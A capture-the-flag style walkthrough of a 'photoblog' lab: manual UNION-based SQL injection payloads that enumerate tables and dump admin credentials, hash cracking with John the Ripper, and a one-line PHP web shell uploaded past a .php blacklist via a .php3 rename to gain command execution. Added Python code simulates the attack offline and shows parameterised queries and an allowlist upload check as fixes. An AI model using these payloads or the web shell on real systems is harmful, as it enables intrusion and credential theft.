root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


Task

image

Navigate to the webpage,

image

Click on “pool”, you should get this url

image

To check whether the id parameter is injectable, append a single quote (') to the 3 in the URL. The unbalanced quote breaks the query and should trigger a SQL error in the response, which tells us the value is concatenated straight into the query.

image

We'll exploit this manually from the browser by editing the URL.

Let's find the number of columns returned by the vulnerable query (a UNION only works when both sides return the same number of columns). Append an ORDER BY clause with an increasing column index:

order by 1 -- 
order by 2 --
order by 3 --

Keep increasing the index until the query errors. On this target order by 4 -- - still works and order by 5 -- - fails (note the `-- -` form: a trailing space after `--` is stripped from a URL, so the extra `-` keeps the comment valid).

image

The error on the 5th index means the query returns only 4 columns.

Next, find which of the 4 columns is actually rendered on the page, since only a displayed column can carry string data back to us. The AND 0 makes the original WHERE clause false so the page shows only the row from our UNION, and each column gets a distinct number as a marker:

AND 0 UNION SELECT 1,2,3,4-- -

Whichever number appears in the page is the reflected column

image

The page shows 2, so column 2 is the one we can use to read data.

To get the name of the current database, place database() in the reflected column:

UNION SELECT 1,database(),3,4-- -

image

The database is named photoblog.

To list the table names, query information_schema.tables for that schema (if the page only renders one row, wrap table_name in GROUP_CONCAT() to get all names in a single row):

UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema="photoblog"-- -

Trying this query

image

We get the tables in the database; the interesting one is the users table.

To list the column names of the users table, query information_schema.columns the same way:

UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_schema="photoblog" AND table_name="users"-- -

Trying this query

image

We get the login and password columns. Let's dump them, concatenated with a colon (0x3a is ':' in hex, which avoids putting a quoted string in the URL):

UNION SELECT 1,CONCAT(login,0x3a,password),3,4 FROM users-- -

You should get this

image
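The whole extraction procedure above, as an added, runnable example that is not part of the original writeup. It simulates the photoblog application against an in-memory SQLite database (the real target runs MySQL; SQLite is used only so this runs offline, so `sqlite_master` and `||` stand in for `information_schema.tables` and `CONCAT()`), with a constructed schema, a placeholder hash, and an assumed trailing `AND cat_id=1` clause that is what the `-- -` comment strips. The hardened `safe_query` shows the fix: bind the id as a parameter instead of concatenating it.

```python
import sqlite3

# Constructed placeholder; the exercise's real hash is not reproduced here.
ADMIN_HASH = "c0nstructedhashvalue"


def build_db():
    """Constructed stand-in for the photoblog schema (assumption)."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE pictures(id INTEGER, title TEXT, img TEXT, cat_id INTEGER);
        INSERT INTO pictures VALUES (3, 'Pool', 'pool.jpg', 1);
        CREATE TABLE users(id INTEGER, login TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '{ADMIN_HASH}');
    """)
    return db


def vulnerable_query(db, id_param):
    # The bug: the id parameter is concatenated into the SQL string.
    # The trailing clause is assumed; it is what the "-- -" comment removes.
    sql = ("SELECT id,title,img,cat_id FROM pictures WHERE id=" + id_param
           + " AND cat_id=1")
    return db.execute(sql).fetchall()


def render(rows):
    """Simulates the page: it prints the title (2nd column) of the first row."""
    return str(rows[0][1]) if rows else ""


def count_columns(db, limit=32):
    """ORDER BY n succeeds while n <= column count, then errors."""
    for n in range(1, limit + 1):
        try:
            vulnerable_query(db, f"3 ORDER BY {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
    return limit


def find_reflected_column(db, ncols):
    """AND 0 hides the real row; the marker that shows up is the reflected column."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = vulnerable_query(db, f"3 AND 0 UNION SELECT {markers}-- -")
    return int(render(rows))


def union_payload(expr, ncols, pos):
    """Put expr in the reflected position, numeric filler everywhere else."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = expr
    return "3 AND 0 UNION SELECT " + ",".join(cols)


def list_tables(db, ncols, pos):
    # MySQL equivalent: GROUP_CONCAT(table_name) FROM information_schema.tables
    # WHERE table_schema='photoblog'
    payload = (union_payload("group_concat(name)", ncols, pos)
               + " FROM sqlite_master WHERE type='table'-- -")
    return render(vulnerable_query(db, payload))


def dump_users(db, ncols, pos):
    # MySQL equivalent: CONCAT(login,0x3a,password); SQLite concatenates with ||
    payload = union_payload("login||':'||password", ncols, pos) + " FROM users-- -"
    return [row[pos - 1] for row in vulnerable_query(db, payload)]


def safe_query(db, id_param):
    """Fix: validate and bind the id; injected text never reaches the parser."""
    try:
        pic_id = int(id_param)
    except ValueError:
        return []
    return db.execute(
        "SELECT id,title,img,cat_id FROM pictures WHERE id=? AND cat_id=1",
        (pic_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    n = count_columns(db)
    pos = find_reflected_column(db, n)
    print("columns:", n, "reflected:", pos)
    print("tables:", list_tables(db, n, pos))
    print("users:", dump_users(db, n, pos))
    print("safe:", safe_query(db, "3 AND 0 UNION SELECT 1,2,3,4-- -"))
```

The same payload strings work against the real target once you swap in the MySQL expressions noted in the comments; `safe_query` returns nothing for the payload because the whole string is treated as a value, never as SQL.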

We have the password hash for the admin user. Save it to a file and crack it with John the Ripper (John detects common hash formats itself; if it picks the wrong one, pass --format explicitly)

image

We got the admin password.

Logging in to the web application with the recovered credentials

image

We are logged in.

We can go ahead to add a picture

image image

Let's try to upload a PHP script instead of a picture. We'll use this minimal web shell, which runs whatever is passed in the cmd query parameter:

<?php system($_GET['cmd']); ?>

Save this in a file, then try to upload it

image image image

Alright, so the ".php" extension is blocked. This looks like an extension blacklist, so rename the file to another extension the PHP handler still executes, say .php3

image

Lets try to upload this again

image image

Our script was uploaded successfully, so the filter only rejects the literal .php suffix.

Navigating to the path where the script was stored and passing a command in the cmd parameter

image image

The command output comes back in the page: we have remote code execution on this web server.
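The upload filter that the .php3 rename defeats, as an added example that is not the exercise's own code: `blacklist_allows` is the weak check the writeup implies (refuse only the literal `.php` suffix), and `allowlist_allows` is the hardened version a practitioner would want (lowercase extension on an allowlist, exactly one extension component, content sniffed against an image signature). The field names, the signatures table and the sample filenames are all constructed for the example.

```python
import posixpath
import secrets

BLOCKED = {".php"}

# Weak check: refuses only the exact ".php" suffix. Older Debian/Ubuntu mod_php
# configs also hand .php3/.php4/.php5/.phtml to the PHP engine, so shell.php3
# (or shell.PHP) passes this check and is still executed.
def blacklist_allows(filename):
    _, ext = posixpath.splitext(filename)
    return ext not in BLOCKED


ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}
# Constructed magic-byte table for the sniff check.
MAGIC = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}


def allowlist_allows(filename, data):
    """Hardened check: allowlisted extension, single extension, matching magic."""
    name = posixpath.basename(filename).lower()
    if name.count(".") != 1:          # rejects shell.php.jpg and dotfiles
        return False
    _, ext = posixpath.splitext(name)
    if ext not in ALLOWED:
        return False
    sniffed = next((e for sig, e in MAGIC.items() if data.startswith(sig)), None)
    if sniffed is None:
        return False
    return sniffed == ext or {sniffed, ext} == {".jpg", ".jpeg"}


def storage_name(filename):
    """Never reuse the client's name on disk: random name plus the checked extension."""
    _, ext = posixpath.splitext(posixpath.basename(filename).lower())
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    shell = b"<?php system($_GET['cmd']); ?>"
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16  # constructed JPEG header
    for fname, data in [("shell.php", shell), ("shell.php3", shell),
                        ("shell.php.jpg", jpeg), ("pool.jpg", jpeg)]:
        print(fname, blacklist_allows(fname), allowlist_allows(fname, data))
```

Even with the allowlist, the upload directory should be served with PHP execution disabled; the extension and content checks limit what gets stored, the server configuration is what stops a stored file from running.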

To complete this exercise, we have to run the binary

image image

We have successfully completed this exercise, it was a fun and easy one😎